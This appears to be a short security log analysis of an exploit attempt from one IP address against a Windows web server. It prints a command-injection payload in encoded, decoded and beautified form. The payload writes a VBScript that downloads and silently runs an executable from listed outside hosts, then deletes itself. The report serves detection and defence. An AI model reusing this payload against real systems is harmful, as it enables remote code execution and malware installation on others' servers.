Windows Server Side Exploit attempt from 122.228.207.244

1. https://virustracker.net/122.228.207.244
2.  
3. The request shows a server exploit attempt by placing a %00 with followed VisualBasic code. This is the request path:
4.  
5. /?search==%00{.exec|cmd.exe+%2Fc+echo%3E22222.vbs+dim+wait%2Cquit%2Cout%3ASet+xml%3DCreateObject%28%22Microsoft.XMLHTTP%22%29%3ASet+WshShell+%3D+Wscript.CreateObject%28%22WScript.Shell%22%29+%3ADS%3DArray%28%22123.108.109.100%22%2C%22123.108.109.100%3A53%22%2C%22123.108.109.100%3A443%22%2C%22178.33.196.164%22%2C%22178.33.196.164%3A53%22%2C%22178.33.196.164%3A443%22%29%3Afor+each+Url+in+DS%3Await%3Dtrue%3Aquit%3Dfalse%3AD%28Url%29%3Aif+quit+then%3Aexit+for%3Aend+if%3Anext%3ASub+D%28Url%29%3Aif+IsObject%28xml%29%3Dfalse+then%3ASet+xml%3DCreateObject%28%22Microsoft.XMLHTTP%22%29%3Aend+if+%3Axml.Open+%22GET%22%2C%22http%3A%2F%2F%22%5E%26Url%5E%26%22%2Fgetsetup.exe%22%2CTrue%3Axml.OnReadyStateChange%3DGetRef%28%22xmlstat%22%29%3Aout%3DNow%3Axml.Send%28%29%3Awhile%28wait+and+60%5E%3Eabs%28datediff%28%22s%22%2CNow%2Cout%29%29%29%3Awscript.sleep%281000%29%3Awend%3AEnd+Sub%3Asub+xmlstat%28%29%3AIf+xml.ReadyState%5E%3C%5E%3E4+Then%3Aexit+sub%3Aend+if%3Await%3Dfalse%3Aif+xml.status%5E%3C%5E%3E200+then%3Aexit+sub%3Aend+if%3Aquit%3Dtrue%3Aon+error+resume+next%3Aset+sGet%3DCreateObject%28%22ADODB.Stream%22%29%3AsGet.Mode%3D3%3AsGet.Type%3D1%3AsGet.Open%28%29%3AsGet.Write+xml.ResponseBody%3AsGet.SaveToFile+%22ko.exe%22%2C2%3AEnd+sub%3AWshShell.run+%22ko.exe%22%2C0%2C0%3ASet+fso+%3DCreateObject%28%22Scripting.Filesystemobject%22%29+%3Afso.DeleteFile%28WScript.ScriptFullName%29+%26+cscript+22222.vbs.}
6.  
7. Decoded:
8.  
9. /?search=={.exec|cmd.exe /c echo>22222.vbs dim wait,quit,out:Set xml=CreateObject("Microsoft.XMLHTTP"):Set WshShell = Wscript.CreateObject("WScript.Shell") :DS=Array("123.108.109.100","123.108.109.100:53","123.108.109.100:443","178.33.196.164","178.33.196.164:53","178.33.196.164:443"):for each Url in DS:wait=true:quit=false:D(Url):if quit then:exit for:end if:next:Sub D(Url):if IsObject(xml)=false then:Set xml=CreateObject("Microsoft.XMLHTTP"):end if :xml.Open "GET","http://"^&Url^&"/getsetup.exe",True:xml.OnReadyStateChange=GetRef("xmlstat"):out=Now:xml.Send():while(wait and 60^>abs(datediff("s",Now,out))):wscript.sleep(1000):wend:End Sub:sub xmlstat():If xml.ReadyState^<^>4 Then:exit sub:end if:wait=false:if xml.status^<^>200 then:exit sub:end if:quit=true:on error resume next:set sGet=CreateObject("ADODB.Stream"):sGet.Mode=3:sGet.Type=1:sGet.Open():sGet.Write xml.ResponseBody:sGet.SaveToFile "ko.exe",2:End sub:WshShell.run "ko.exe",0,0:Set fso =CreateObject("Scripting.Filesystemobject") :fso.DeleteFile(WScript.ScriptFullName) & cscript 22222.vbs.}
10.  
11.  
12. Beautified:
13.  
14. dim wait,quit,out
15. Set xml=CreateObject("Microsoft.XMLHTTP")
16. Set WshShell = Wscript.CreateObject("WScript.Shell")
17. DS=Array("123.108.109.100","123.108.109.100
18. 53","123.108.109.100
19. 443","178.33.196.164","178.33.196.164
20. 53","178.33.196.164
21. 443")
22. for each Url in DS
23.     wait=true
24.     quit=false
25.     D(Url)
26.     if quit then
27.         exit for
28.     end if
29. next
30. Sub D(Url)
31.     if IsObject(xml)=false then
32.         Set xml=CreateObject("Microsoft.XMLHTTP")
33.     end if
34.     xml.Open "GET","http://"^&Url^&"/getsetup.exe",True
35.     xml.OnReadyStateChange=GetRef("xmlstat")
36.     out=Now
37.     xml.Send()
38.     while(wait and 60^>abs(datediff("s",Now,out)))
39.     wscript.sleep(1000)
40. wend
41. End Sub
42. sub xmlstat()
43. If xml.ReadyState^<^>4 Then
44.     exit sub
45. end if
46. wait=false
47. if xml.status^<^>200 then
48.     exit sub
49. end if
50. quit=true
51. on error resume next
52. set sGet=CreateObject("ADODB.Stream")
53. sGet.Mode=3
54. sGet.Type=1
55. sGet.Open()
56. sGet.Write xml.ResponseBody
57. sGet.SaveToFile "ko.exe",2
58. End sub
59. WshShell.run "ko.exe",0,0
60. Set fso =CreateObject("Scripting.Filesystemobject")
61. fso.DeleteFile(WScript.ScriptFullName)